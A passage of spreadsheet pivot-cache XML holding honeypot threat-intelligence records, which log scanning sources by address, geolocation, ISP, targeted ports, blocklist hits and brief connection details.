    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93a1:ed65"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1583"/>
    <x v="1583"/>
    <s v="azpdes1ehs7j.stretchoid.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T00:10:07"/>
    <d v="2025-03-06T19:50:02"/>
    <d v="2025-04-16T00:10:07"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="44391&amp;&amp;5432&amp;&amp;NA&amp;&amp;3389&amp;&amp;161&amp;&amp;23&amp;&amp;631&amp;&amp;1521&amp;&amp;5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;request&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d8:f8ed"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1584"/>
    <x v="1584"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T23:22:18"/>
    <d v="2025-04-15T23:22:18"/>
    <d v="2025-04-15T23:22:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:456a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1585"/>
    <x v="1585"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T23:13:31"/>
    <d v="2023-12-05T18:54:00"/>
    <d v="2025-04-15T23:13:31"/>
    <n v="146"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="MT_SB&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="NA&amp;&amp;19321&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="Railtel"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,65067)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,50069)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,50129)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,51075)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,11905)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,11924)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,12371)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,50584)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,51135)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,63378)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,63773)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa8:5788"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1586"/>
    <x v="1586"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:59:01"/>
    <d v="2025-04-15T22:46:21"/>
    <d v="2025-04-15T22:59:01"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fd:eb5c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1587"/>
    <x v="1587"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:56:34"/>
    <d v="2024-11-25T18:35:27"/>
    <d v="2025-04-15T22:56:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:d862"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1588"/>
    <x v="1588"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:50:39"/>
    <d v="2025-04-15T22:50:39"/>
    <d v="2025-04-15T22:50:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:4424"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1589"/>
    <x v="1589"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:29:47"/>
    <d v="2023-07-25T18:22:37"/>
    <d v="2025-04-15T22:29:47"/>
    <n v="62"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="59102&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JO"/>
    <s v="Jordan"/>
    <s v="AM"/>
    <s v="Amman"/>
    <s v="NA"/>
    <s v="Amman"/>
    <s v="250441"/>
    <s v="NA"/>
    <s v="31.9539"/>
    <s v="35.9106"/>
    <s v="9038"/>
    <s v="Batelco Jordan"/>
    <s v="Umniah Lil-Hawatef Al-Mutanaqelah Co"/>
    <s v="cellular"/>
    <s v="Umniah Company"/>
    <s v="2012-04-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25dc:7b7d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1590"/>
    <x v="1590"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:27:29"/>
    <d v="2025-04-15T22:24:35"/>
    <d v="2025-04-15T22:27:29"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Ambala"/>
    <s v="Nanhera"/>
    <s v="10436804"/>
    <s v="NA"/>
    <s v="30.3192"/>
    <s v="76.848"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfb9:3767"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1591"/>
    <x v="1591"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:20:14"/>
    <d v="2025-04-15T22:20:14"/>
    <d v="2025-04-15T22:20:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783e:76a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1592"/>
    <x v="1592"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T22:05:08"/>
    <d v="2025-04-15T22:04:16"/>
    <d v="2025-04-15T22:05:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Marine Parade"/>
    <s v="1882778"/>
    <s v="449536"/>
    <s v="1.32429"/>
    <s v="103.893"/>
    <s v="55430"/>
    <s v="Starhub Internet Pte Ltd"/>
    <s v="StarHub Cable Vision Ltd"/>
    <s v="residential"/>
    <s v="StarHub Ltd NGNBN Services"/>
    <s v="2007-05-18"/>
    <s v="StarHub-Ltd-NGNBN-Services"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7458:42a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1593"/>
    <x v="1593"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:45:02"/>
    <d v="2025-04-15T21:45:02"/>
    <d v="2025-04-15T21:45:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:fd89"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1594"/>
    <x v="1594"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:44:05"/>
    <d v="2025-04-15T21:44:05"/>
    <d v="2025-04-15T21:44:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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c:e147"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1595"/>
    <x v="1595"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:43:39"/>
    <d v="2025-04-15T21:43:39"/>
    <d v="2025-04-15T21:43:39"/>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3:88d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1596"/>
    <x v="1596"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:40:19"/>
    <d v="2025-04-15T21:40:19"/>
    <d v="2025-04-15T21:40:19"/>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3b5c:ab5c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1597"/>
    <x v="1597"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:29:14"/>
    <d v="2025-04-15T21:27:25"/>
    <d v="2025-04-15T21:29:14"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="DF"/>
    <s v="Federal District"/>
    <s v="Brasília"/>
    <s v="Brasília"/>
    <s v="3469058"/>
    <s v="NA"/>
    <s v="-15.7797"/>
    <s v="-47.9297"/>
    <s v="26615"/>
    <s v="TIM S/A"/>
    <s v="TIM S/A"/>
    <s v="business"/>
    <s v="TIM S/A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b3fb:f806"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1598"/>
    <x v="1598"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:26:57"/>
    <d v="2025-04-15T21:26:57"/>
    <d v="2025-04-15T21:26:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:b060"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1599"/>
    <x v="1599"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:23:32"/>
    <d v="2025-04-15T21:11:54"/>
    <d v="2025-04-15T21:23:32"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:12e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1600"/>
    <x v="1600"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T21:20:33"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-15T21:20:33"/>
    <n v="544"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_DNS_H32&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;15616&amp;&amp;53014&amp;&amp;51225&amp;&amp;54771&amp;&amp;55874&amp;&amp;50898&amp;&amp;51438&amp;&amp;61075&amp;&amp;51825&amp;&amp;61149&amp;&amp;64063&amp;&amp;54679&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Azimpur"/>
    <s v="7701354"/>
    <s v="NA"/>
    <s v="23.7555"/>
    <s v="90.3732"/>
    <s v="38712"/>
    <s v="TelNET Communication Ltd"/>
    <s v="Telnet Communication Limited"/>
    <s v="business"/>
    <s v="Telnet"/>
    <s v="2008-03-20"/>
    <s v="TELNETBD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7832:170a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1601"/>
    <x v="1601"/>
    <s v="p3512173-ipxg12901souka.saitama.ocn.ne.jp"/>
    <x v="0"/>
